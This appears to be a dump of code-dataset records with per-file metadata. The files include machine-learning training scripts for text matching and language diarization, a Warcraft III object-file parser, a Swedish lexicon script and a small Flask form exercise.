            name='country',
            field=models.CharField(max_length=255),
        ),
    ]
| 25.08 | 119 | 0.586922 | 66 | 627 | 5.454545 | 0.712121 | 0.05 | 0.083333 | 0.105556 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.052036 | 0.295056 | 627 | 24 | 120 | 26.125 | 0.762443 | 0.07177 | 0 | 0.222222 | 1 | 0 | 0.068966 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.055556 | 0 | 0.222222 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
e5c399ccf40bc25cefef6274b5920b5a4ae32549 | 7,048 | py | Python | dssm/train.py | nlpming/tensorflow-DSMM | dc982cc49bf03f474da2895e4dd4fb37061c0271 | [
"MIT"
] | null | null | null | dssm/train.py | nlpming/tensorflow-DSMM | dc982cc49bf03f474da2895e4dd4fb37061c0271 | [
"MIT"
] | null | null | null | dssm/train.py | nlpming/tensorflow-DSMM | dc982cc49bf03f474da2895e4dd4fb37061c0271 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
#encoding=utf-8
'''
@Time : 2020/10/25 22:28:30
@Author : zhiyang.zzy
@Contact : zhiyangchou@gmail.com
@Desc : 训练相似度模型
1. siamese network,分别使用 cosine、曼哈顿距离
2. triplet loss
'''
# here put the import lib
from model.bert_classifier import BertClassifier
import os
import time
from numpy.lib.arraypad import pad
import nni
from tensorflow.python.ops.gen_io_ops import write_file
import yaml
import logging
import argparse
logging.basicConfig(level=logging.INFO)
import data_input
from config import Config
from model.siamese_network import SiamenseRNN, SiamenseBert
from data_input import Vocabulary, get_test
from util import write_file
def train_siamese():
    """Train the siamese RNN text matcher on the LCQMC splits.

    FIX: the config file handle was opened without being closed; it is now
    read in a with-block.  Dead `pass`/commented-out code removed.
    """
    cfg_path = "./configs/config.yml"
    with open(cfg_path, encoding='utf-8') as fh:
        cfg = yaml.load(fh, Loader=yaml.FullLoader)
    # Load the train/validation/test splits.
    data_train, data_val, data_test = data_input.get_lcqmc()
    print("train size:{},val size:{}, test size:{}".format(
        len(data_train), len(data_val), len(data_test)))
    model = SiamenseRNN(cfg)
    model.fit(data_train, data_val, data_test)
def predict_siamese(file_='./results/'):
    """Restore the trained siamese RNN and write predictions for *file_*.

    FIX: config file handle is now closed via a with-block; dead `pass`
    removed.
    """
    cfg_path = "./configs/config.yml"
    with open(cfg_path, encoding='utf-8') as fh:
        cfg = yaml.load(fh, Loader=yaml.FullLoader)
    # Map token sequences to ids with the training vocabulary.
    vocab = Vocabulary(meta_file='./data/vocab.txt', max_len=cfg['max_seq_len'], allow_unk=1, unk='[UNK]', pad='[PAD]')
    test_arr, query_arr = get_test(file_, vocab)
    model = SiamenseRNN(cfg)
    model.restore_session(cfg["checkpoint_dir"])
    test_label, test_prob = model.predict(test_arr)
    # Append the predicted label and probability to each original row.
    out_arr = [x + [test_label[i]] + [test_prob[i]] for i, x in enumerate(query_arr)]
    write_file(out_arr, file_ + '.siamese.predict', )
def train_siamese_bert():
    """Train the siamese BERT matcher on LCQMC (NNI-tunable).

    FIX: config file handle is now closed via a with-block; dead `pass`
    removed.
    """
    cfg_path = "./configs/config_bert.yml"
    with open(cfg_path, encoding='utf-8') as fh:
        cfg = yaml.load(fh, Loader=yaml.FullLoader)
    # NNI supplies one sampled hyperparameter set per trial; it overrides
    # the matching keys of the static config.
    tuner_params = nni.get_next_parameter()
    cfg.update(tuner_params)
    # Map token sequences to ids with the training vocabulary.
    vocab = Vocabulary(meta_file='./data/vocab.txt', max_len=cfg['max_seq_len'], allow_unk=1, unk='[UNK]', pad='[PAD]')
    data_train, data_val, data_test = data_input.get_lcqmc_bert(vocab)
    print("train size:{},val size:{}, test size:{}".format(
        len(data_train), len(data_val), len(data_test)))
    model = SiamenseBert(cfg)
    model.fit(data_train, data_val, data_test)
def predict_siamese_bert(file_="./results/input/test"):
    """Restore the siamese BERT matcher and write predictions for *file_*.

    FIX: config file handle is now closed via a with-block; dead `pass`
    removed.
    """
    cfg_path = "./configs/config_bert.yml"
    with open(cfg_path, encoding='utf-8') as fh:
        cfg = yaml.load(fh, Loader=yaml.FullLoader)
    os.environ["CUDA_VISIBLE_DEVICES"] = "4"
    # Map token sequences to ids with the training vocabulary.
    vocab = Vocabulary(meta_file='./data/vocab.txt', max_len=cfg['max_seq_len'], allow_unk=1, unk='[UNK]', pad='[PAD]')
    test_arr, query_arr = data_input.get_test_bert(file_, vocab)
    print("test size:{}".format(len(test_arr)))
    model = SiamenseBert(cfg)
    model.restore_session(cfg["checkpoint_dir"])
    test_label, test_prob = model.predict(test_arr)
    # Append the predicted label and probability to each original row.
    out_arr = [x + [test_label[i]] + [test_prob[i]] for i, x in enumerate(query_arr)]
    write_file(out_arr, file_ + '.siamese.bert.predict', )
def train_bert():
    """Train the single-tower BERT classifier on LCQMC (NNI-tunable).

    FIX: config file handle is now closed via a with-block; dead `pass`
    removed.
    """
    cfg_path = "./configs/bert_classify.yml"
    with open(cfg_path, encoding='utf-8') as fh:
        cfg = yaml.load(fh, Loader=yaml.FullLoader)
    # NNI supplies one sampled hyperparameter set per trial.
    tuner_params = nni.get_next_parameter()
    cfg.update(tuner_params)
    # Map token sequences to ids with the training vocabulary.
    vocab = Vocabulary(meta_file='./data/vocab.txt', max_len=cfg['max_seq_len'], allow_unk=1, unk='[UNK]', pad='[PAD]')
    # is_merge=1: both sentences are packed into one BERT input sequence.
    data_train, data_val, data_test = data_input.get_lcqmc_bert(vocab, is_merge=1)
    print("train size:{},val size:{}, test size:{}".format(
        len(data_train), len(data_val), len(data_test)))
    model = BertClassifier(cfg)
    model.fit(data_train, data_val, data_test)
def predict_bert(file_="./results/input/test"):
    """Restore the BERT classifier and write predictions for *file_*.

    FIX: config file handle is now closed via a with-block; dead `pass`
    removed.
    """
    cfg_path = "./configs/bert_classify.yml"
    with open(cfg_path, encoding='utf-8') as fh:
        cfg = yaml.load(fh, Loader=yaml.FullLoader)
    # Map token sequences to ids with the training vocabulary.
    vocab = Vocabulary(meta_file='./data/vocab.txt', max_len=cfg['max_seq_len'], allow_unk=1, unk='[UNK]', pad='[PAD]')
    # is_merge=1: both sentences are packed into one BERT input sequence.
    test_arr, query_arr = data_input.get_test_bert(file_, vocab, is_merge=1)
    print("test size:{}".format(len(test_arr)))
    model = BertClassifier(cfg)
    model.restore_session(cfg["checkpoint_dir"])
    test_label, test_prob = model.predict(test_arr)
    # Append the predicted label and probability to each original row.
    out_arr = [x + [test_label[i]] + [test_prob[i]] for i, x in enumerate(query_arr)]
    write_file(out_arr, file_ + '.bert.predict', )
def siamese_bert_sentence_embedding(file_="./results/input/test.single"):
    """Write one sentence embedding per input line (one query per line).

    FIX: config file handle is now closed via a with-block; dead `pass`
    removed.
    """
    cfg_path = "./configs/config_bert.yml"
    with open(cfg_path, encoding='utf-8') as fh:
        cfg = yaml.load(fh, Loader=yaml.FullLoader)
    cfg['batch_size'] = 64
    os.environ["CUDA_VISIBLE_DEVICES"] = "7"
    # Map token sequences to ids with the training vocabulary.
    vocab = Vocabulary(meta_file='./data/vocab.txt', max_len=cfg['max_seq_len'], allow_unk=1, unk='[UNK]', pad='[PAD]')
    test_arr, query_arr = data_input.get_test_bert_single(file_, vocab)
    print("test size:{}".format(len(test_arr)))
    model = SiamenseBert(cfg)
    model.restore_session(cfg["checkpoint_dir"])
    test_label = model.predict_embedding(test_arr)
    # Serialize each embedding vector as a comma-joined string.
    test_label = [",".join([str(y) for y in x]) for x in test_label]
    out_arr = [[x, test_label[i]] for i, x in enumerate(query_arr)]
    print("write to file...")
    write_file(out_arr, file_ + '.siamese.bert.embedding', )
if __name__ == "__main__":
    os.environ["CUDA_VISIBLE_DEVICES"] = "4"
    ap = argparse.ArgumentParser()
    # FIX: --method/--file help strings were copy-pasted from --mode.
    ap.add_argument("--method", default="bert", type=str,
                    help="rnn | bert | bert_siamese | bert_siamese_embedding")
    ap.add_argument("--mode", default="train", type=str, help="train/predict")
    ap.add_argument("--file", default="./results/input/test", type=str,
                    help="input file for the predict modes")
    args = ap.parse_args()
    if args.mode == 'train' and args.method == 'rnn':
        train_siamese()
    elif args.mode == 'predict' and args.method == 'rnn':
        predict_siamese(args.file)
    elif args.mode == 'train' and args.method == 'bert_siamese':
        train_siamese_bert()
    elif args.mode == 'predict' and args.method == 'bert_siamese':
        predict_siamese_bert(args.file)
    elif args.mode == 'train' and args.method == 'bert':
        train_bert()
    elif args.mode == 'predict' and args.method == 'bert':
        predict_bert(args.file)
    elif args.mode == 'predict' and args.method == 'bert_siamese_embedding':
        # Emits one sentence embedding per input line, e.g. for vector
        # recall with faiss; train with a loss matching the index metric
        # (L2 or cosine) for best retrieval quality.
        siamese_bert_sentence_embedding(args.file)
    else:
        # FIX: unknown mode/method combinations used to fall through
        # silently and do nothing.
        ap.error("unsupported combination: --mode {} --method {}".format(
            args.mode, args.method))
| 40.045455 | 119 | 0.678065 | 1,001 | 7,048 | 4.541459 | 0.16983 | 0.029696 | 0.025737 | 0.021557 | 0.715794 | 0.703256 | 0.678179 | 0.658821 | 0.630004 | 0.601408 | 0 | 0.008202 | 0.169694 | 7,048 | 175 | 120 | 40.274286 | 0.768626 | 0.109393 | 0 | 0.512397 | 0 | 0 | 0.172309 | 0.035617 | 0 | 0 | 0 | 0 | 0 | 1 | 0.057851 | false | 0.057851 | 0.115702 | 0 | 0.173554 | 0.057851 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 3 |
e5c7a4ae568522e409aa3f1c6efdf5afa6011ded | 6,517 | py | Python | train_blstm_e2e.py | ishine/E2E-langauge-diarization | 0bcb3ec82bd6de6fac848c66fd5ad8fe7b284f0e | [
"MIT"
] | 4 | 2021-12-13T10:24:23.000Z | 2021-12-22T09:40:58.000Z | train_blstm_e2e.py | ishine/E2E-langauge-diarization | 0bcb3ec82bd6de6fac848c66fd5ad8fe7b284f0e | [
"MIT"
] | null | null | null | train_blstm_e2e.py | ishine/E2E-langauge-diarization | 0bcb3ec82bd6de6fac848c66fd5ad8fe7b284f0e | [
"MIT"
] | 2 | 2021-04-07T02:34:17.000Z | 2021-04-23T03:33:54.000Z | import os
import random
import argparse
import torch
import torch.nn as nn
import numpy as np
from torch.utils.data import DataLoader
from tqdm import tqdm
from model import *
from Loss import *
from data_load import *
from model_evaluation import *
#python train_blstm_e2e.py --savedir "/home/hexin/Desktop/models" --train "/home/hexin/Desktop/data/train.txt" --test "/home/hexin/Desktop/data/test.txt"
# --seed 0 --device 0 --batch 8 --epochs 60 --dim 23 --lang 3 --model my_sa_e2e --lr 0.00001 --lambda 0.5
def setup_seed(seed):
    """Seed all RNGs used by training and force deterministic cuDNN.

    FIX: the file imports `random` but never seeded it; Python's own RNG
    is now seeded as well for full reproducibility.
    """
    random.seed(seed)
    torch.manual_seed(seed)
    torch.cuda.manual_seed_all(seed)  # no-op on CPU-only machines
    np.random.seed(seed)
    # Trade cuDNN autotuning speed for bitwise-reproducible kernels.
    torch.backends.cudnn.deterministic = True
    torch.backends.cudnn.benchmark = False
def get_lr(optimizer):
    """Return the learning rate of the optimizer's first parameter group
    (None if the optimizer has no parameter groups)."""
    return next((group['lr'] for group in optimizer.param_groups), None)
def get_output(outputs, seq_len):
    """Concatenate the valid (non-padded) timesteps of a padded batch.

    outputs: (batch, max_len, feat) tensor; seq_len: per-item lengths.
    Returns a (sum(seq_len), feat) tensor, or 0 when seq_len is empty
    (matching the original behavior).
    """
    pieces = [outputs[i, :length, :] for i, length in enumerate(seq_len)]
    if not pieces:
        return 0
    return torch.cat(pieces, dim=0)
def main():
    """Train and validate the BLSTM E2E language-diarization model.

    Fixes applied to the original:
    - `args.lambda` is a SyntaxError (`lambda` is a keyword); the option is
      now stored under `lambda_` via dest= while the CLI flag is unchanged.
    - Mixed `rnn_utils`/`rnn_util` names unified on `rnn_utils`
      (NOTE(review): assumed to be torch.nn.utils.rnn — confirm the alias
      exported by data_load/model imports).
    - `'{.4f}'` in the final print was an invalid format spec.
    - `best_eer` is initialised so the final print cannot raise NameError
      when accuracy never improves.
    - The checkpoint path honors --savedir instead of a hard-coded path.
    """
    parser = argparse.ArgumentParser(description='paras for making data')
    parser.add_argument('--model', type=str, help='model name', default='my_BLSTM')
    parser.add_argument('--savedir', type=str, help='dir in which the trained model is saved')
    parser.add_argument('--train', type=str, help='training data, in .txt')
    parser.add_argument('--test', type=str, help='testing data, in .txt')
    parser.add_argument('--seed', type=int, help='random seed', default=0)
    parser.add_argument('--batch', type=int, help='batch size', default=8)
    parser.add_argument('--device', type=int, help='Device name', default=0)
    parser.add_argument('--epochs', type=int, help='num of epochs', default=120)
    parser.add_argument('--dim', type=int, help='dim of input features', default=437)
    parser.add_argument('--lang', type=int, help='num of language classes', default=3)
    parser.add_argument('--lr', type=float, help='initial learning rate', default=0.0001)
    parser.add_argument('--lambda', dest='lambda_', type=float,
                        help='hyperparameter for joint training', default=0.5)
    args = parser.parse_args()
    setup_seed(args.seed)
    device = torch.device('cuda:{}'.format(args.device) if torch.cuda.is_available() else 'cpu')

    # Build the model and the two joint-training losses.
    model = BLSTM_E2E_LID(n_lang=args.lang,
                          dropout=0.25,
                          input_dim=args.dim,
                          hidden_size=256,
                          num_emb_layer=2,
                          num_lstm_layer=3,
                          emb_dim=256)
    model.to(device)
    loss_func_DCL = DeepClusteringLoss().to(device)
    loss_func_CRE = nn.CrossEntropyLoss().to(device)

    # Data loaders over the raw feature lists.
    train_set = RawFeatures(args.train)
    valid_set = RawFeatures(args.test)
    train_data = DataLoader(dataset=train_set,
                            batch_size=args.batch,
                            pin_memory=True,
                            num_workers=16,
                            shuffle=True,
                            collate_fn=collate_fn)
    valid_data = DataLoader(dataset=valid_set,
                            batch_size=1,
                            pin_memory=True,
                            shuffle=False,
                            collate_fn=collate_fn)

    # Optimizer with cosine-annealed learning rate over the full run.
    optimizer = torch.optim.Adam(model.parameters(), lr=args.lr)
    scheduler = torch.optim.lr_scheduler.CosineAnnealingLR(optimizer, T_max=args.epochs)

    total_step = len(train_data)
    best_acc = 0
    best_eer = 0.0
    save_dir = args.savedir if args.savedir else '/home/hexin/Desktop/models'
    for epoch in tqdm(range(args.epochs)):
        model.train()
        for step, (utt, labels, seq_len) in enumerate(train_data):
            utt_ = utt.to(device=device, dtype=torch.float)
            utt_ = rnn_utils.pack_padded_sequence(utt_, seq_len, batch_first=True)
            labels_ = rnn_utils.pack_padded_sequence(labels, seq_len, batch_first=True).data.to(device)
            # Forward pass: frame-level language posteriors + embeddings.
            outputs, embeddings = model(utt_)
            loss_DCL = loss_func_DCL(embeddings, labels_)
            loss_CRE = loss_func_CRE(outputs, labels_)
            # Joint objective: lambda * cross-entropy + (1-lambda) * DCL.
            loss = args.lambda_ * loss_CRE + (1 - args.lambda_) * loss_DCL
            # Backward and optimize.
            optimizer.zero_grad()
            loss.backward()
            optimizer.step()
            if step % 200 == 0:
                print("Epoch [{}/{}], Step [{}/{}] Loss: {:.4f} CRE: {:.4f} DCL: {:.4f}"
                      .format(epoch + 1, args.epochs, step + 1, total_step, loss.item(), loss_CRE.item(), loss_DCL.item()))
        scheduler.step()

        # ---- validation ----
        model.eval()
        correct = 0
        total = 0
        eer = 0
        FAR_list = torch.zeros(args.lang)
        FRR_list = torch.zeros(args.lang)
        with torch.no_grad():
            for step, (utt, labels, seq_len) in enumerate(valid_data):
                utt = utt.to(device=device, dtype=torch.float)
                utt_ = rnn_utils.pack_padded_sequence(utt, seq_len, batch_first=True)
                labels_ = rnn_utils.pack_padded_sequence(labels, seq_len, batch_first=True).data.to(device)
                outputs, embeddings = model(utt_)
                predicted = torch.argmax(outputs, -1)
                total += labels.size(-1)
                correct += (predicted == labels_).sum().item()
                FAR, FRR = compute_far_frr(args.lang, predicted, labels_)
                FAR_list += FAR
                FRR_list += FRR
        acc = correct / total
        print('Current Acc.: {:.4f} %'.format(100 * acc))
        # Per-language EER as the mean of false-accept and false-reject rates.
        for i in range(args.lang):
            eer_ = (FAR_list[i] / total + FRR_list[i] / total) / 2
            eer += eer_
            print("EER for label {}: {:.4f}%".format(i, eer_ * 100))
        print('EER: {:.4f} %'.format(100 * eer / args.lang))
        if acc > best_acc:
            print('New best Acc.: {:.4f}%, EER: {:.4f} %, model saved!'.format(100 * acc, 100 * eer / args.lang))
            best_acc = acc
            best_eer = eer / args.lang
            torch.save(model.state_dict(),
                       os.path.join(save_dir, '{}.ckpt'.format(args.model)))
    print('Final Acc: {:.4f}%, Final EER: {:.4f}%'.format(100 * best_acc, 100 * best_eer))
# Script entry point: run the full training/validation loop.
if __name__ == "__main__":
    main()
| 43.446667 | 153 | 0.588154 | 829 | 6,517 | 4.437877 | 0.247286 | 0.029356 | 0.05545 | 0.017396 | 0.164719 | 0.144061 | 0.129927 | 0.129927 | 0.111987 | 0.111987 | 0 | 0.02124 | 0.284794 | 6,517 | 149 | 154 | 43.738255 | 0.768076 | 0.060457 | 0 | 0.062016 | 0 | 0 | 0.099918 | 0.004415 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.093023 | null | null | 0.046512 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
e5c851fb9a85bd589c9d3056d5470e792ff6484e | 2,551 | py | Python | war3structs/objects.py | sides/war3structs | 171c91240346e610e22cf10bab0c6d526996f855 | [
"MIT"
] | 10 | 2019-12-07T12:10:13.000Z | 2022-02-24T12:45:32.000Z | war3structs/objects.py | warlockbrawl/war3structs | 171c91240346e610e22cf10bab0c6d526996f855 | [
"MIT"
] | null | null | null | war3structs/objects.py | warlockbrawl/war3structs | 171c91240346e610e22cf10bab0c6d526996f855 | [
"MIT"
] | 3 | 2020-02-28T12:43:26.000Z | 2020-06-08T23:31:29.000Z | from construct import *
from .common import *
"""
Formats: w3u, w3t, w3b, w3h, w3d, w3a, w3q
Version: 1
The objects file contains data that the object editor would typically
manipulate. If dealing with abilities, doodads or upgrades, the
ObjectsWithVariationsFile is used instead of the ObjectsFile.
Optionally, the ObjectsBestFitFile can be used as well which tries to
parse the file with both formats--one should always fail when used
with the other, so it selects whichever didn't fail. Performance
should be really bad on this.
"""
class ObjectModificationTerminatorValidator(Validator):
    """Validates the 4-byte id that terminates a modification record.

    Accepted values (per ``_validate``): four NUL bytes, or a repeat of the
    enclosing object's ``new_object_id`` or ``original_object_id``.
    """

    def _validate(self, obj, ctx, path):
        # ctx._ is the enclosing object definition struct, which carries
        # new_object_id / original_object_id.
        return obj in [b"\x00\x00\x00\x00", ctx._.new_object_id, ctx._.original_object_id]
# One field modification: the field id being changed, the value's type tag,
# the value itself, and a terminator checked by the validator above.
ObjectModification = Struct(
    "modification_id" / ByteId,
    "value_type" / Enum(Integer, INT=0, REAL=1, UNREAL=2, STRING=3),
    "value" / Switch(this.value_type, {
        "INT" : Integer,
        "REAL" : Float,
        "UNREAL" : Float,
        "STRING" : String
    }),
    # Either b"\x00\x00\x00\x00" or one of the enclosing object's ids.
    "parent_object_id" / ObjectModificationTerminatorValidator(ByteId)
)

# One object: the id it derives from, its own id, and its modifications.
ObjectDefinition = Struct(
    "original_object_id" / ByteId,
    "new_object_id" / ByteId,
    "modifications_count" / Integer,
    "modifications" / Array(this.modifications_count, ObjectModification)
)

ObjectTable = Struct(
    "objects_count" / Integer,
    "objects" / Array(this.objects_count, ObjectDefinition)
)

# File layout: version, table of edited original objects, table of custom ones.
ObjectsFile = Struct(
    "version" / Integer,
    "original_objects_table" / ObjectTable,
    "custom_objects_table" / ObjectTable
)

# Variant used for abilities, doodads and upgrades (see module docstring):
# each modification additionally carries a variation number and an ability
# data column selector.
ObjectModificationWithVariation = Struct(
    "modification_id" / ByteId,
    "value_type" / Enum(Integer, INT=0, REAL=1, UNREAL=2, STRING=3),
    "variation" / Integer,
    "ability_data_column" / Enum(Integer, A=0, B=1, C=2, D=3, F=4, G=5, H=6),
    "value" / Switch(this.value_type, {
        "INT" : Integer,
        "REAL" : Float,
        "UNREAL" : Float,
        "STRING" : String
    }),
    "parent_object_id" / ObjectModificationTerminatorValidator(ByteId)
)

ObjectDefinitionWithVariations = Struct(
    "original_object_id" / ByteId,
    "new_object_id" / ByteId,
    "modifications_count" / Integer,
    "modifications" / Array(this.modifications_count, ObjectModificationWithVariation)
)

ObjectTableWithVariations = Struct(
    "objects_count" / Integer,
    "objects" / Array(this.objects_count, ObjectDefinitionWithVariations)
)

ObjectsWithVariationsFile = Struct(
    "version" / Integer,
    "original_objects_table" / ObjectTableWithVariations,
    "custom_objects_table" / ObjectTableWithVariations
)

# Try the variations format first, fall back to the plain one; per the module
# docstring exactly one of the two should parse for a given file.
ObjectsBestFitFile = Select(ObjectsWithVariationsFile, ObjectsFile)
| 30.369048 | 86 | 0.73579 | 287 | 2,551 | 6.390244 | 0.428571 | 0.034896 | 0.030534 | 0.028353 | 0.430752 | 0.430752 | 0.387132 | 0.387132 | 0.387132 | 0.329335 | 0 | 0.014365 | 0.154057 | 2,551 | 83 | 87 | 30.73494 | 0.835496 | 0 | 0 | 0.466667 | 0 | 0 | 0.214391 | 0.021537 | 0 | 0 | 0 | 0 | 0 | 1 | 0.016667 | false | 0 | 0.033333 | 0.016667 | 0.083333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e5c8fc169ab19e9767386e1463980ba6e2c72681 | 3,078 | py | Python | lexicon.py | adamlek/swedish-lexical-blends | 5189bcc1680fda5ac32637dd63b895c091b56997 | [
"MIT"
] | null | null | null | lexicon.py | adamlek/swedish-lexical-blends | 5189bcc1680fda5ac32637dd63b895c091b56997 | [
"MIT"
] | null | null | null | lexicon.py | adamlek/swedish-lexical-blends | 5189bcc1680fda5ac32637dd63b895c091b56997 | [
"MIT"
] | null | null | null | import pickle
from collections import defaultdict
from helper_functions import format_lemma, get_blends_csv
from os import listdir
import networkx as nx
def saldo_obj(filename):
    """Parse a SALDO lexicon dump into {lemma: (pos, father, mother, lemma_id)}.

    Lines starting with '#' are skipped. Fields are tab-separated; the POS tag
    is taken from the second-to-last column and upper-cased.
    """
    saldo = defaultdict(int)
    with open(filename) as src:
        for raw in src:
            # '#' marks comment/header lines in the dump.
            if raw.startswith('#'):
                continue
            fields = raw.split('\t')
            lemma_id, mother, father = fields[0], fields[1], fields[2]
            # Ids look like 'word..pos.N'; the lemma is the part before '..'.
            lemma = lemma_id.split('..')[0].lower()
            saldo[lemma] = (fields[-2].upper(), father, mother, lemma_id)
    return saldo
# def construct_network(saldo):
# G = nx.DiGraph()
# for k, (_, m, f, li) in saldo.items():
# if m not in G.nodes:
# G.add_node(m)
# if f not in G.nodes:
# G.add_node(m)
# if li not in G.nodes:
# G.add_node(li)
# if k not in G.nodes:
# G.add('_' + k)
# if G.has_edge(li, k):
# G[k][li]['weight'] += 1
# else:
# G.add_edge(k, li, weight=1)
# if G.jas
def get_candidates(candidate_folder=None):
    """Collect every candidate source word mentioned in the per-blend files.

    Each file in *candidate_folder* is named ``<blend>_...`` and contains one
    ``word1,word2`` candidate pair per line.

    :param candidate_folder: directory (with trailing separator) holding the
        candidate files; defaults to the original hard-coded SALDO candidates
        directory so existing ``get_candidates()`` calls are unchanged.
    :return: set of all candidate words seen in any file.
    """
    if candidate_folder is None:
        lexicon = 'saldo'
        candidate_folder = f'/home/adam/Documents/lexical_blends_project/{lexicon}_blends_candidates_noverlap_1/'
    # (the unused `corpus = 'news'` local from the original was dropped)

    c_set = set()
    for i, filename in enumerate(listdir(candidate_folder)):
        blend = filename.split('_')[0]
        print('### reading blend:', i, blend)
        with open(candidate_folder + filename) as f:
            for ln in f:
                cw1, cw2 = ln.rstrip().split(',')
                c_set.add(cw1)
                c_set.add(cw2)
    return c_set
def nst_obj(filename):
    """Parse an NST pronunciation lexicon into {word: (pos, sampa)}.

    The file is ';'-separated and latin-1 encoded; lines starting with '!'
    or '-' are skipped. The SAMPA transcription sits in column 11.
    """
    nst = defaultdict(int)
    with open(filename, encoding='iso-8859-1') as f:
        for line in f:
            if line.startswith(('!', '-')):
                continue
            fields = line.split(';')
            # A POS tag may list alternatives as 'NN|VB|...'; keep the first.
            # (The original stripped these with a while-loop that could only
            # ever run once -- a single split is equivalent.)
            pos = fields[1].split('|')[0]
            nst[fields[0].lower()] = (pos, fields[11])
    return nst
if __name__ == '__main__':
    # One-off steps used to build the pickles read below (kept for reference):
    #   nst = nst_obj('/home/adam/data/NST_svensk_leksikon/swe030224NST.pron/swe030224NST.pron')
    #   saldo = saldo_obj('/home/adam/data/saldo_2.3/saldo20v03.txt')
    #   pickle.dump(...) into the data/ directory.
    def _load_pickle(path):
        # Small local helper so both lexica are loaded the same way.
        with open(path, 'rb') as fh:
            return pickle.load(fh)

    nst = _load_pickle('/home/adam/Documents/lexical_blends_project/data/nst_lex.pickle')
    saldo = _load_pickle('/home/adam/Documents/lexical_blends_project/data/saldo_lex.pickle')

    c_set = get_candidates()

    # Spot-check the first entries of each lexicon.
    print(list(saldo.keys())[:100])
    print(list(nst.keys())[:100])

    # Fraction of candidate words covered by the NST lexicon.
    n_set = set(nst.keys())
    s_set = set(saldo.keys())
    true = len(c_set.intersection(n_set)) / len(c_set)
    print(true)
| 29.596154 | 109 | 0.556855 | 414 | 3,078 | 3.987923 | 0.277778 | 0.033919 | 0.051484 | 0.072683 | 0.312538 | 0.264082 | 0.190188 | 0.17868 | 0.17868 | 0.152029 | 0 | 0.022263 | 0.299545 | 3,078 | 103 | 110 | 29.883495 | 0.743506 | 0.27258 | 0 | 0.033898 | 0 | 0 | 0.12291 | 0.095346 | 0 | 0 | 0 | 0 | 0 | 1 | 0.050847 | false | 0 | 0.084746 | 0 | 0.186441 | 0.067797 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e5cc7b20cfa963b9093b9d8a0f7b606c9c72c66a | 1,737 | py | Python | app.py | macloo/flask-form-exercise | e487c84cfe6fb995aa1615c2c6e3c6f1cef5a537 | [
"MIT"
] | null | null | null | app.py | macloo/flask-form-exercise | e487c84cfe6fb995aa1615c2c6e3c6f1cef5a537 | [
"MIT"
] | null | null | null | app.py | macloo/flask-form-exercise | e487c84cfe6fb995aa1615c2c6e3c6f1cef5a537 | [
"MIT"
] | null | null | null | from flask import Flask, render_template, redirect, url_for
from flask_bootstrap import Bootstrap
from flask_wtf import FlaskForm
from wtforms import StringField, SubmitField
from wtforms.validators import Required
import csv
app = Flask(__name__)
app.config['DEBUG'] = True

# Flask-WTF requires an encryption key - the string can be anything
# NOTE(review): secrets normally belong in environment/config, not in source
# control -- fine for a classroom exercise.
app.config['SECRET_KEY'] = '8BYkEfBA6O6donzWlSihBXox7C0sKR6b'

# Flask-Bootstrap requires this line
Bootstrap(app)
# ---------------------------------------------------------------------------
# with Flask-WTF, each web form is represented by a class
# "RestForm" can be changed; "(FlaskForm)" cannot
# see the route for "/" to see how this is used
class RestForm(FlaskForm):
    """Web form for entering a restaurant name; rendered by the '/' route."""
    restaurant = StringField('Restaurant name', validators=[Required()])
    submit = SubmitField('Submit')
# Exercise:
# add: address, city, state, zip, phone, url, cuisine, price_range
# make price_range a select element with choice of $ to $$$$
# make all fields required except submit
# ---------------------------------------------------------------------------
# all Flask routes below
@app.route('/', methods=['GET', 'POST'])
def index():
    """Render the restaurant entry form (GET) and receive submissions (POST)."""
    form = RestForm()
    # Exercise:
    # Make the form write a new row into restaurants.csv
    # with if form.validate_on_submit()
    return render_template('index.html', form=form)
@app.route('/restaurants')
def restaurants():
    """List every row of restaurants.csv via the rest.html template."""
    # 'with' guarantees the file is closed even if reading raises; the
    # original opened/closed manually and leaked the handle on error.
    with open('restaurants.csv', newline='') as csvfile:
        list_of_rows = list(csv.reader(csvfile, delimiter=','))
    return render_template('rest.html', rests=list_of_rows)
# keep this as is
# Runs the Flask development server when executed directly (not under WSGI).
if __name__ == '__main__':
    app.run(debug=True)
